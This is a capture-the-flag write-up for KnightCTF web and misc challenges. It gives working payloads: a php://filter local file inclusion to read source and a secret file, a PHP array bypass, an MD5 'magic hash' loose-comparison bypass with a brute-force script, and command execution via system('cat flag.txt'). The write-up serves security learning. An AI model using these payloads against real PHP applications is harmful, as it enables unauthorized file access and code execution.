KNIGHTCTF

WEB

Sometime you need to look wayback

A URL is visible in the page source; it points to a GitHub repository.

Visit it and look through the commit history to get the flag.

Obsfuscation Isn’t Enough


Viewing the page source reveals JSFuck. Paste it into the browser console and it decodes to 150484514b6eeb1d99da836d95f6671d.php

Visiting that page gives:
KCTF{0bfuscat3d_J4v4Scr1pt_aka_JSFuck}

Find Pass Code - 1

A comment in the page source gives a hint: pass a source parameter with the value param, which shows the source.

The color scheme is truly eye-searing. A simple array bypass works: pass_code[]=a

POST it with HackBar and the flag comes out.

My PHP Site

payload:

?file=php://filter/read=convert.base64-encode/resource=index.php

This returns the source as base64; decoding it gives:

<?php

if(isset($_GET['file'])){
    if ($_GET['file'] == "index.php") {
        echo "<h1>ERROR!!</h1>";
        die();
    }else{
        include $_GET['file'];
    }

}else{
    echo "<h1>You are missing the file parameter</h1>";

    #note :- secret location /home/tareq/s3crEt_fl49.txt
}

?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Tareq's Home Page</title>
</head>
<body>
</body>
</html>
Then request:

?file=s3crEt_fl49.txt

and get the flag.

Find Pass Code - 2

First get the source.

Same eye-searing color scheme as before.

<?php
require "flag.php";
$old_pass_codes = array("0e215962017", "0e730083352", "0e807097110", "0e840922711");
$old_pass_flag = false;
if (isset($_POST["pass_code"]) && !is_array($_POST["pass_code"])) {
    foreach ($old_pass_codes as $old_pass_code) {
        if ($_POST["pass_code"] === $old_pass_code) {
            $old_pass_flag = true;
            break;
        }
    }
    if ($old_pass_flag) {
        echo "Sorry ! It's an old pass code.";
    } else if ($_POST["pass_code"] == md5($_POST["pass_code"])) {
        echo "KCTF Flag : {$flag}";
    } else {
        echo "Oh....My....God. You entered the wrong pass code.<br>";
    }
}
if (isset($_GET["source"])) {
    print show_source(__FILE__);
}

?>

Here we need to bypass $_POST["pass_code"] == md5($_POST["pass_code"]).

Since == is a loose comparison, a string of the form 0e followed only by digits is treated as the number 0. So we need a value starting with 0e whose MD5 hash also starts with 0e and contains only digits after it; both sides then compare as 0 and the check passes.

The following script does the search:

import hashlib

def md5_enc(s):
    m = hashlib.md5()
    m.update(str(s).encode('utf-8'))
    return m.hexdigest()

if __name__ == '__main__':
    result = []
    for i in range(0, 9999999999):
        i = '0e' + str(i)
        enc = md5_enc(i)
        print(i + " md5 is " + enc)
        # the first two characters of the md5 must be 0e
        if enc[:2] == "0e":
            # everything after 0e must be digits only
            if enc[2:].isdigit():
                result.append(i)
                print("Got Result:" + i)
                break

However, "0e215962017", "0e730083352", "0e807097110" and "0e840922711" cannot be used here, because they are in old_pass_codes.

Here I used 0e00275209979.

payload:

pass_code=0e00275209979
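Added example (not part of the writeup): a small Python model of why the challenge's == check accepts such a value, the strict comparison that would close the hole, and the same 0e search the script above performs, minus the per-candidate printing. The php_loose_eq model is a deliberate simplification of PHP's numeric-string rules; all helper names here are my own.

```python
import hashlib
import re

# "0e" followed only by digits is a numeric string with value 0 in PHP,
# so two such strings compare equal under the loose == operator.
ZERO_E = re.compile(r"^0e[0-9]+$")


def md5_hex(s):
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def php_loose_eq(a, b):
    """Simplified model of PHP's == on two strings (assumption: inputs are
    plain decimal/scientific numeric strings or not numeric at all).
    Numeric strings are compared as numbers, anything else byte for byte."""
    try:
        return float(a) == float(b)
    except ValueError:
        return a == b


def is_magic_md5(s):
    """True when both s and md5(s) are '0e' + digits, i.e. s == md5(s) in PHP."""
    return bool(ZERO_E.match(s)) and bool(ZERO_E.match(md5_hex(s)))


def vulnerable_check(pass_code):
    """The challenge's check as written: loose comparison with its own MD5."""
    return php_loose_eq(pass_code, md5_hex(pass_code))


def fixed_check(pass_code):
    """Same check with strict comparison (=== in PHP): only a true MD5
    fixed point would pass, and none is known."""
    return pass_code == md5_hex(pass_code)


def find_magic_md5(start, stop, exclude=()):
    """Brute-force '0e<i>' for i in [start, stop), skipping excluded codes;
    returns the first magic value or None (same search as the script above)."""
    for i in range(start, stop):
        cand = "0e" + str(i)
        if cand not in exclude and is_magic_md5(cand):
            return cand
    return None


if __name__ == "__main__":
    for code in ("0e215962017", "0e730083352", "0e807097110", "0e840922711"):
        print(code, md5_hex(code), vulnerable_check(code), fixed_check(code))
```

The old pass codes from the challenge all print True for the loose check and False for the strict one, which is exactly the gap the search exploits.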

Zero is not the limit

If zero is not the limit, try -1. That gives the flag.

Do Something Special

The URL given cannot be visited directly; this looks like an encoding problem. URL-encode it, visit it again, and get the flag.

Most Secure Calculator - 1

Direct command execution: system("cat flag.txt")

MISC

The Hungry Dragon

3 rings and 11 balls.

KCTF{3_doughnut_and_11_sweet}